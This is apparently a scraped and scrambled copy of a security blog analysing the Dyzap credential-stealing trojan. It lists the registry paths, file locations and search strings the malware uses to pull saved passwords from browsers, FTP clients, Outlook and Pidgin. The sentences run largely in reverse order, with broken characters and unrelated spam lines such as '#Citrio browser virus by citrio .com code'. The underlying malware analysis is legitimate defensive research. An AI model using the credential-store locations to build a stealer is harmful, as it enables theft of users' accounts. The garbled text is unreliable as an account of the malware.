"\Microsoft\Sticky Notes\StickyNotes.snt" "\Notepad++\plugins\config\NppFTP\NppFTP.xml" "\QupZilla\profiles\default\browsedata.db” The following table shows all the applications and associated files that the malware searches in looking for confidential information. "%AppData%\Roaming\.purple\accounts.xml." Dyzap tries to find the *.xml file by searching in possible directories (Figure 6) and then copies the file to be sent later to its C&C server.įigure 6: Possible directories to find target file This app saves the login information for the accounts inside an XML file in For instance, Pidgin is a chat program, which lets the user log in to accounts on multiple chat networks simultaneously. Table 1: Applications whose malware tries to steal from their registries PidginĪnother capability of Dyzap is stealing confidential information from files storing login credentials that reside on the infected machine. "Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook" "Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook" "Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook" "Software\NCH Software\ClassicFTP\FTPAccounts" "Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete" Malware is then hardcoded into the registry’s path – which might contain confidential information – for each application. Upon finding them, Dyzap queries subkeys values for “Password,” “User,” and “HostName.” Table 1, below, is a list of the applications that may be targeted by their registries. For instance, in Far FTP the malware simply searches the following paths, as shown in Figure 5: Other than stealing from database files, the Dyzap malware also attempts to harvest confidential information from the registry for some FTP applications. These browsers include Firefox, IceDragon, Safari, K-Melon, SeaMonkey, Flok, Thunderbird, BlackHawk, Postbox, Cyberfox, and Pale Moon. Despite the misleading name of login.json, it is actually a sqlite database that includes all saved usernames and passwords. Firefox Familyįor the Firefox family of browsers, Dyzap searches for the signons.sqlite and login.json files to locate and steal credentials.
Finally, it extracts user account using the string patterns “password_value,” “username_value,” and “original_url,” as shown in in Figure 4.įigure3: Dyzap looks for the file in hardcoded directoriesįigure 4: Dyzap looks for login information by hard coded stringsĪ very similar routine is repeated for other browsers in the family, including: Comodo Dragon, MapleStudio, Chrome, Nichrome, RockMelt, Spark, Chromium, Titan Browser, Torche, Yandex, Epic Privacy Browser, CocCoc Browser, Vivaldi, Comodo Chromodo, Superbird, Coowon, Mustang Browser, 360Browser, CatalinaGroup Citrio, Chrome SxS, Orbitum, Iridium, and Opera. Next, it looks up a “unique” string pattern to extract login information from the “logins” table. To acquire login information, it first verifies that the target is a SQlite3 file. If the file exists, it copies the content into a temp file for further operations.
#Citrio browser virus by citrio .com code
As an example, Chromium stores login information in a file called “Login Data” or “Web Data.” Using the code snippet and hard coded file path shown in Figure 3, it searches for possible directory containing the files just mentioned. One of the main routines of Dyzap is to steal login information from the sqlite3 database file. Referenced paths might be different in other OSs.
#Citrio browser virus by citrio .com windows 7
All the following analysis has been conducted under Windows 7 32-bit.
To gain a better understanding of the different approaches Dyzap is able to employ, we picked four applications and analyzed how Dyzap obtains login credentials from them. Figure 2 shows some of the targeted applications, such as Fossamail, Postbox, and others.įigure 2: Part of applications that malware attempts to steal This enables it to steal data from databases, registries and also from the files of applications installed on the infected machine. In order to steal data from different kinds of applications, Dyzap approaches each of them differently. Stealing Routineĭyzap targets more than one hundred applications to steal information from, including browsers, FTP applications, and more. In this blog, we will explain how the malware steals user accounts, acts as a keylogger, and communicates with its C&C server. Stolen information may include, but is not limited to, system information and application credentials stored on infected systems. FortiGuard Researchers recently discovered a new variant of this Trojan virus. Dyzap belongs to a family of malware designed to steal confidential information from enormous target applications by installing a “man in the browser” attack into common browsers.
0 kommentar(er)
